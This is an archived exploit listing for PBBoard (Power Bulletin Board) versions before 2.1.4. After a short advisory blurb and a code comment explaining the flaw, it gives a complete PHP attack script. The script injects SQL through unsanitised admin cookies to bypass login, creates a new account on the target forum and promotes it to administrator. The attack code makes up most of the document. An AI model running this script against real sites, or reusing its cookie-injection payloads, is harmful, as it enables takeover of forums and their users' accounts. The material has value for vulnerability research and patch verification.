96 lines
No EOL
4 KiB
PHP
96 lines
No EOL
4 KiB
PHP
source: https://www.securityfocus.com/bid/54862/info
|
|
|
|
PBBoard is a web-based messaging board application implemented in PHP.
|
|
|
|
Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.
|
|
|
|
PBBoard versions prior to 2.1.4 are vulnerable.
|
|
http://drupal.org/node/207891
|
|
|
|
<?
|
|
/*
|
|
+ Application : Power Bulletin Board < 2.1.4
|
|
| Download : pbboard.com
|
|
| By Faris , AKA i-Hmx
|
|
| n0p1337@gmail.com
|
|
+ sec4ever.com , 1337s.cc
|
|
|
|
Time line :
|
|
> 14/7/2012 , Vulnerability discovered
|
|
> 30/7/2012 , Vendor Reported
|
|
> 31/7/2012 , patch released
|
|
> 01/8/2012 , Public disclosure
|
|
|
|
|
|
engine/engine.class.php
|
|
$this->_CONF['admin_username_cookie'] = 'PowerBB_admin_username';
|
|
$this->_CONF['admin_password_cookie'] = 'PowerBB_admin_password';
|
|
admin/common.module.php
|
|
if (!empty($username)
|
|
and !empty($password))
|
|
{
|
|
$CheckArr = array();
|
|
$CheckArr['username'] = $username;
|
|
$CheckArr['password'] = $password;
|
|
|
|
$CheckMember = $PowerBB->member->CheckAdmin($CheckArr);
|
|
|
|
if ($CheckMember != false)
|
|
{
|
|
$PowerBB->_CONF['rows']['member_row'] = $CheckMember;
|
|
$PowerBB->_CONF['member_permission'] = true;
|
|
}
|
|
else
|
|
{
|
|
$PowerBB->_CONF['member_permission'] = false;
|
|
}
|
|
|
|
}
|
|
Function CheckAdmin is called from
|
|
engine/systyms/member.class.php
|
|
go deeper and deeper till u find the vulnerable query
|
|
this can be used to bypass login rules as cookies are not sanitized before being called for login confirmation
|
|
*/
|
|
echo "\n+-------------------------------------------+\n";
|
|
echo "| PBulletin Board < 2.1.4 |\n";
|
|
echo "| Auth Bypass vuln / Admin add Exploit |\n";
|
|
echo "| By i-Hmx |\n";
|
|
echo "| n0p1337@gmail.com |\n";
|
|
echo "+-------------------------------------------+\n";
|
|
echo "\n| Enter Target # ";
|
|
function get($url,$post,$cookies){
|
|
$curl=curl_init();
|
|
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
|
|
curl_setopt($curl,CURLOPT_URL,"http://".$url);
|
|
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
|
|
curl_setopt($curl,CURLOPT_COOKIE,$cookies);
|
|
//curl_setopt($curl, CURLOPT_REFERER, $reffer);
|
|
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
|
|
curl_setopt($curl,CURLOPT_TIMEOUT,20);
|
|
curl_setopt($curl, CURLOPT_HEADER, true);
|
|
$exec=curl_exec($curl);
|
|
curl_close($curl);
|
|
return $exec;
|
|
}
|
|
function kastr($string, $start, $end){
|
|
$string = " ".$string;
|
|
$ini = strpos($string,$start);
|
|
if ($ini == 0) return "";
|
|
$ini += strlen($start);
|
|
$len = strpos($string,$end,$ini) - $ini;
|
|
return substr($string,$ini,$len);
|
|
}
|
|
$vic=str_replace('http://','',trim(fgets(STDIN)));
|
|
if($vic==''){exit();}
|
|
$log=fopen('faris.txt','w+');
|
|
$ran=rand(10000,20000);
|
|
echo "| Adding New User\n";
|
|
$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
|
|
$myid=kastr($add,'main=1&id=','">');
|
|
if($myid==''){exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit");}
|
|
echo "| User Data :\n + UserName : f4ris_$ran\n + Password : sec4ever1337s\n + User ID : $myid\n";
|
|
echo "| Updating User privileges\n";
|
|
$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
|
|
echo "+ Exploitatin Done ;)\n";
|
|
exit();
|
|
?>
|